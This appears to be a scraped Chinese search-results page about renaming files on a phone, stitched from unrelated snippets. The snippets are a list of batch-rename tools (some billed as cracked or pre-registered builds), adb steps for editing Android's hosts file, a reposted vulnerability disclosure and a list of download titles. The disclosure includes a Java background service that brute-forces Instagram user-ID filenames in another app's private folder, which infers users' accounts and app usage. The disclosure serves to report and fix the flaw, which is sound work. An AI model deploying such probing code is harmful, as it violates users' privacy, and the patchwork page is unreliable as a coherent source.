精华内容
下载资源
问答
  • 如何批量修改文件名

    2019-04-24 16:58:30
    有时候我们在进行文件名字修改的时候,常常会需要修改大量的文件名,如果一个个修改,不仅很费时间,而且效率非常的低,还容易弄错,这时候批量修改文件名工具就派用场了,一键设置批量修改文件名,不论是图片、...

    批量修改文件名软件大全由绿色资源网小编整理,有时候我们在进行文件名字修改的时候,常常会需要修改大量的文件名,如果一个个修改,不仅很费时间,而且效率非常的低,还容易弄错,这时候批量修改文件名工具就派上用场了,一键设置批量修改文件名,不论是图片、文档还是压缩包格式。统统轻松搞定,小编今天就为大家带来了一些非常好用的批量文件改名软件,包括批量重命名手机版、拖把更名器、妖眼文件批量改名工具、文件批量改名之星全能版、手机批量重命名工具、批量更名专家RenameWiz、批量更名快车等,欢迎有需要的朋友到绿色资源网下载使用!

    最简单的批量修改文件名的工具,最简单的方法如下:

    如何批量修改文件名 – 文件名批量修改的简单方法

    http://126163.net/1245.html

    当然,你可用以下软件来修改。

    批量重命名手机版v1.1 安卓版
    批量重命名app是一款文件名批量修改类手机软件,支持图片、音频视频、文档等格式的修改,不用一个个手动修改,轻轻一点即可批量重命名,还可

    拖把更名器(批量修改文件名)v1.98i 官方版
    拖把更名器是一款非常实用的批量修改文件名工具。软件功能强大,结合资源管理器右键菜单,支持音乐文件转换、标签内码转换、繁简转换等,并

    妖眼文件批量改名工具v1.23 绿色版
    妖眼文件批量改名工具是一款非常实用的文件批量改名工具。新版本运行更加稳定,速度也比较快,支持简单改名、文件编号、列表改名等,赶快下

    文件批量改名之星全能版v2.2.6 无限制特别版
    文件批量改名之星破解版是一款专业的文件批量改名工具。软件功能强大,支持修改所有格式的文件,可以修改文件名、文件时间、文件属性等,一

    批量更名专家(RenameWiz)v2.6 注册版
    批量更名专家破解版(RenameWiz)是一款多功能的文件名批量修改工具。软件的界面非常简洁,与资源管理器类似,使用起来很方便;支持修改文件日

    ZIP批量更名v1.0 绿色版
    ZIP批量更名是一款批量修改zip格式文件名称的软件,绿色小巧,使用方便,对于解决下载的ZIP压缩包不是文件的真实名称有很大的帮助,就是一个

    文件名批量替换和添加前缀工具v2.0 绿色版
    2012.4.1 更新V2.0:添加了批量替换的功能,更名为:文件名批量替换&添加前缀-我下吧专版原创:文件名批量添加前缀-我下吧专版V1.0软件

    以上软件都可用来批量修改文件名,有兴趣的可以去试试。

    展开全文
  • 该代码可直接在Android手机上用于处理戏剧作品中的音乐和声音效果。 版权所有(c)2014-2015 Piotr Mirowski 如何修改代码 该代码是使用Mac上的Eclipse IDE开发的。 请参考以下资源进行自己的编辑: Android开发...
  • android 如何配置host地址

    千次阅读 2016-06-12 11:23:25
    m/etc的,我们需要修改/system/etc/hosts来实现。但是这个文件是只读,不能通过shell直接修改。可以通过连接到PC使用adb来修改。...5、将PC机文件复制到手机:adb push <PC机上文件名&am

        由于某些原因,可能需要指定域名对应的IP地址。Android是基于Linux的系统,与Linux类似,通过hosts文件来设置。

         在Android下,/etc是link到/system/etc的,我们需要修改/system/etc/hosts来实现。但是这个文件是只读,不能通过shell直接修改。可以通过连接到PC上使用adb来修改。步骤如下:

    1、获得root权限:adb root

    2、设置/system为可读写:adb remount

    3、将hosts文件复制到PC:adb pull /system/etc/hosts <PC机上文件名>

    4、修改PC机上文件

    5、将PC机上文件复制到手机:adb push <PC机上文件名> /system/etc/hosts

    如果要查看是否修改成功,可以在PC上执行adb shell,运行cat /system/etc/hosts;或者在手机上运行cat /system/etc/hosts。

     

         host没有生效的解决方法:

         手动配置域名的时候,有可能会失败,原因是由于换行符导致的,Android系统上已经修改的hosts,使它回复到原始状态。即只有127.0.0.1 localhost。然后进入adb shell , 使用 echo -e \\n >> /system/etc/hosts 为hosts文件加入换行符。再次使用 echo 192.168.1.94 www.leadding.com >> /system/etc/hosts 。
    这样就完整解决了换行问题。

     

    展开全文
  • 下面要介绍的恶意软件可以读取Android手机中其他app的文件元数据,例如文件的名称、大小、以及最后修改日期等等。如果文件名中含有敏感信息的标识,那么这款恶意app会将这份文件识别为敏感文件,并且还可以对其进行...

    前言

    下面要介绍的恶意软件可以读取Android手机中其他app的文件元数据,例如文件的名称、大小、以及最后修改日期等等。如果文件名中含有敏感信息的标识,那么这款恶意app会将这份文件识别为敏感文件,并且还可以对其进行暴力破解攻击。除此之外,它还可以通过分析其他app私有文件的大小和最后修改日期这两部分数据,来对其他app的使用情况进行实时监控。

    实际上,从Android操作系统的诞生之日起,其文件系统中就一直存在着权限问题。当我将该漏洞提交给Google公司之后,Google将这一漏洞归类为了“低危漏洞”,并且给我提供了五百美元的漏洞奖金。

    我写这篇文章的目的只是为了抛砖引玉,希望能给大家提供一个关于处理Android安全问题的思路。

    问题分析

    Android App的私有数据默认会保存在“/data/data/”目录下,其他的App没有权限访问存储在该目录下的数据。接下来,我们用Youtube App来举个例子。

    Android端的Youtube应用程序会将其私有数据保存在目录“/data/data/com.google.android.youtube/”之下。现在,让我们从根目录开始分析一下整个文件系统中各个文件的权限:

    /data/drwxrwx--x system system 2015-11-30 20:30data

    /data/data/drwxrwx--x system system 2015-11-29 15:34data

    /data/data/com.google.android.youtube

    drwxr-x--x u0_a77 u0_a77 2015-11-29 11:02com.google.android.youtube

    /data/data/com.google.android.youtube/*

    drwxrwx--x u0_a77 u0_a77 2015-11-08 18:15app_sslcache

    drwxrwx--x u0_a77 u0_a77 2015-11-30 19:54cache

    drwxrwx--x u0_a77 u0_a77 2015-11-29 13:06 databases

    drwxrwx--x u0_a77 u0_a77 2015-11-12 12:10files

    lrwxrwxrwx install install 2015-11-29 11:02lib -> /data/app-lib/com.google.android.youtube-1

    drwxrwx--x u0_a77 u0_a77 2015-11-30 19:54shared_prefs

    我们可以从上面这部分信息中看到,在整个目录结构中,每一个文件目录都给设备用户提供了完整的执行权限(+x)。

    而我们也知道,所谓的执行权限,就是允许设备用户可以直接运行目标文件的权限。如果将该权限赋予了某一文件目录的话,也就意味着用户只要知道文件夹下具体的文件名,可以直接通过文件名来访问该目录下的文件内容和元数据。但此时还无法直接进入文件夹,以及访问该目录下的文件数据,因为这样的操作将需要相应的读取权限。

    分析结果表明:其他的用户可以使用“cd”命令来进入这些目录,但是无法通过“ls”命令来获取该目录下的所有文件(没有读取权限)。当然了,用户也无法直接在该目录下创建新的文件,因为这将需要文件目录的写入权限(+w):

    u0_a84@mako:/data/data $ ls -la

    opendir failed, Permission denied

    u0_a84@mako:/data/data $ cd com.google.android.youtube

    u0_a84@mako:/data/data/com.google.android.youtube $ ls -la

    opendir failed, Permission denied

    u0_a84@mako:/data/data/com.google.android.youtube $ cdwrongdir

    /system/bin/sh: [22]: cd:/data/data/com.google.android.youtube/wrongdir: No such file or directory

    u0_a84@mako:/data/data/com.google.android.youtube $ cdshared_prefs

    u0_a84@mako:/data/data/com.google.android.youtube/shared_prefs$ ls -la

    opendir failed, Permission denied

    u0_a84@mako:/data/data/com.google.android.youtube/shared_prefs$ echo “test” >test.xml

    /system/bin/sh: [31]: can't create test.xml:Permission denied

    但是,如上所述,如果我们能够提前获取到目标文件的名称,那么我们就可以列出该文件,并获取目标文件的元数据了。接下来,我们还是继续分析Youtube App。在默认情况下,该App会在“/data/data/com.google.android.youtube/” 目录下的“shared_prefs”文件夹中生成一个名为“youtube.xml”的文件。虽然很多其他的App可以列出这个文件,但是由于权限的问题,所以这些App是无法读取这份文件的:

    u0_a84@mako:/data/data/com.google.android.youtube/shared_prefs$ ls -la youtube.xml

    -rw-rw---- u0_a77 u0_a77 6680 2015-11-30 19:54youtube.xml

    u0_a84@mako:/data/data/com.google.android.youtube/shared_prefs$ cat youtube.xml

    /system/bin/sh: [28]: cat: youtube.xml:Permission denied

    正如上面这段信息所示,任何恶意App都可以做到下面这两件事情:

    1. 通过“ls”命令来查看其他App的某些私有文件是否存在于文件系统中,但前提是要知道目标文件的文件名称;
    2. 获取到这些私有文件的大小和最后修改日期;

    这绝对是一个安全漏洞,因为我们可以通过以下两种不同的方式来利用这个漏洞:

    1. 恶意App可以可以通过监视特定的私有文件来实时监控某些App的使用情况。比如说,如果恶意App想要知道Android设备的用户一般在何时打开Youtube客户端,那么它就可以定期检查Youtube客户端“shared_prefs”目录下的“youtube.xml”文件,并从获取到的文件大小和最后修改日期来判断用户的使用习惯。因为当用户打开Youtube客户端时,这个文件将会被修改。因此,恶意App还可以通过这个漏洞来分析某些应用程序的使用情况。
    2. 如果某个合法的App选择将敏感数据保存在一个文件中,而文件名称一看就知道是用来存储敏感数据的话,那么恶意App就可以选择对该文件进行暴力破解攻击。比如说,Instagram和Facebook会使用用户ID(USERID)来标识某些敏感文件。不光是这两个App,很多其他的App也会采用这样的方式来处理敏感文件,这种情况我已经见过很多次了。

    Instagram:/data/data/com.instagram.android/shared_prefs/.xml

    Facebook:/data/data/com.facebook.katana/shared_prefs/XStorage-LATEST-.xml

    比如说Instagram,用户ID标识符(USERID)的范围在0-2500000000之间,所以恶意App可以通过暴力破解的手段直接在本地发动攻击。恶意App可以利用下面这段Android代码来在后台对用户标识符进行暴力破解攻击:

    import java.io.File;

    import java.math.BigInteger;

    import android.app.Service;

    import android.content.Intent;

    import android.os.IBinder;

    import android.util.Log;

    public class MyService extends Service {

    @Override

    public intonStartCommand(Intent intent, int flags, int startId) {

    newThread(new Runnable() {

    publicvoid run() {

    Log.v("brute", "Bruteforce started");

    BigInteger begin = BigInteger.ZERO;

    BigInteger end = new BigInteger("2500000000");

    String dirPath ="/data/data/com.instagram.android/shared_prefs/";

    while(begin.compareTo(end) != 1) {

    String filename= begin.toString() + ".xml";

    File test = newFile(dirPath,filename);

    if(test.exists()) {

    Log.v("brute", "Account found: " +begin.toString());

    }

    begin =begin.add(BigInteger.ONE);

    }

    Log.v("brute", "Bruteforce ended");

    }

    }).start();

    returnService.START_STICKY;

    }

    @Override

    public IBinderonBind(Intent intent) {

    //TODO Auto-generated method stub

    returnnull;

    }

    }

    当上面这段代码所加载的服务被开启之后,恶意App将会被关闭,在后台进行暴力破解攻击的任务就转交给了这个服务来进行。我们在Nexus4手机上进行了攻击模拟,我们遍历了2500000000个可能的文件,总共花费了五天左右的时间,最终成功找到了正确的文件:

    当用户感染了这一恶意软件之后,攻击者就可以通过这样的方式来获取到用户的网络服务ID,进而查找出用户的账号。受影响的可能是Facebook、QQ、Youtube、以及微信这样的社交媒体类App,也有可能是金融类的银行App。值得注意的是,Instagram还包含有一个ContentProvider(com.instagram.contentprovider.CurrentUserProvider),可以用来查询用户注册账号的USERID,但是默认情况下Instagram是禁止其他App使用这个ContentProvider的。

    但是很明显,Instagram这样做的目的肯定不是为了将用户的敏感数据泄露给其他的App。

    这个漏洞是我当初在检测InstagramApp的时候发现的,如果大家对Instagram客户端中存在的其他安全问题感兴趣的话,欢迎各位同学阅读这篇文章[传送门]。

    解决方案

    这个问题其实也很好解决,我们只需要移除“/data/data/”目录下App文件夹的执行权限(+x),就可以解决这个问题了,这样也可以有效地防止攻击者通过“cd”命令和“ls”命令来获取文件目录下的文件基本信息。

    修复前的状态:

    u0_a84@mako:/data/data $ cd com.google.android.youtube

    u0_a84@mako:/data/data/com.google.android.youtube $ cd ..

    u0_a84@mako:/data/data $ ls -lacom.google.android.youtube/shared_prefs/youtube.xml

    -rw-rw---- u0_a77 u0_a77 6680 2015-11-30 19:54youtube.xml

    修复过程:

    root@mako:/data/data # ls -la | grep youtube

    drwxr-x--x u0_a77 u0_a77 2015-11-29 11:02com.google.android.youtube

    root@mako:/data/data # chmod 750com.google.android.youtube

    root@mako:/data/data # ls -la | grep youtube

    drwxr-x--- u0_a77 u0_a77 2015-11-29 11:02com.google.android.youtube

    修复后的状态:

    u0_a84@mako:/data/data $ cd com.google.android.youtube

    /system/bin/sh: [25]: cd:/data/data/com.google.android.youtube: Permission denied

    u0_a84@mako:/data/data $ ls -lacom.google.android.youtube/shared_prefs/youtube.xml

    com.google.android.youtube/shared_prefs/youtube.xml:Permission denied

    本文转自d1net(转载)

    展开全文
  • JAVA百实例源码以及开源项目

    千次下载 热门讨论 2016-01-03 17:37:40
     Java生成密钥、保存密钥的实例源码,通过本源码可以了解到Java如何产生单钥加密的密钥(myKey)、产生双钥的密钥对(keyPair)、如何保存公钥的字节数组、保存私钥到文件privateKey.dat、如何用Java对象序列化保存私钥...
  • Java生成密钥的实例 1个目标文件 摘要:Java源码,算法相关,密钥 Java生成密钥、保存密钥的实例源码,通过本源码可以了解到Java如何产生单钥加密的密钥(myKey)、产生双钥的密钥对(keyPair)、如何保存公钥的字节数组、...
  • C#编程经验技巧宝典

    热门讨论 2008-06-01 08:59:33
    121 <br>0200 如何使用正则表达式验证电话号码 121 <br>0201 如何使用正则表达式验证输入密码条件 121 <br>0202 如何使用正则表达式验证邮政编号 121 <br>0203 如何使用正则表达式验证手机号 ...
  • ZArchiver Donate 0.9.2.apk

    2019-04-11 17:31:03
    如果由于某种原因未提示更新文件,则可以在Android / ru.zdevs.zarchiver.pro / temp /中的存储卡找到修改后的文件。 迷你FAQ: 问:什么密码? 答:某些档案的内容可能会被加密,档案只能用密码打开(不要使用...
  • 如何安装Me客服系统? 1、将整个客服系统文件拷贝到网站根目录下,打开default.php文件,将里边的CSS、DIV和JS客服代码拷贝到网站首页; 2、找到 /Me/msdb.sql 文件,导入到数据库,之后删除msdb.sql文件; 3、找到 ...
  • 做开发需要抓取手机app的http/https的数据包,想看APP发出的http请求和响应是...接下去就是Fiddler的基本操作了,我们已经看到手机上的数据包了。 X-User-Agent:XOne/1.1.2(AndroidPhone;2.2Later;MI 2S/android4.1.1)
  • 阅读工具 开卷有益

    2012-03-31 14:07:03
    经楼主亲身检测 改程序完美支持酷派f800及windows CE 系统手机 1、开卷操作快速入门: 小说阅读界面: 1、点屏幕上下部分: 前后翻页 2、长按屏幕上下部分:连续翻页 3、水平左右横向滑动:前后翻页、阅读导航(CHM)...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.13 置换手机背景图——Gallery与setWallpaper整合实现 5.14 撷取手机现存桌面——getWallpaper与setImageDrawable 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——...
  • 5.15文件资源管理器再进化——java i/o修改文件名及删除 5.16取得目前file与cache的路径——getcachedir与getfilesdir 5.17打开/关闭wifi服务——wifimanager状态判断 5.18取得sim卡内的信息——telephonymanager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • 5.15 文件资源管理器再进化——JavaI/O修改文件名及删除 5.16 取得目前File与Cache的路径——getCacheDir与getFilesDir 5.17 打开/关闭WiFi服务——WifiManager状态判断 5.18 取得SIM卡内的信息——TelephonyManager...
  • [如何使用] 下载程序,解压上传到你的服务器路径下,data目录设置777权限。访问体验超便捷的服务吧! (data目录没有写权限会导致配置修改不能保存、不能新建用户等) [关于上传问题] 程序没有做任何限制,如果需要...

空空如也

空空如也

1 2 3 4 5
收藏数 91
精华内容 36
关键字:

手机上如何修改文件名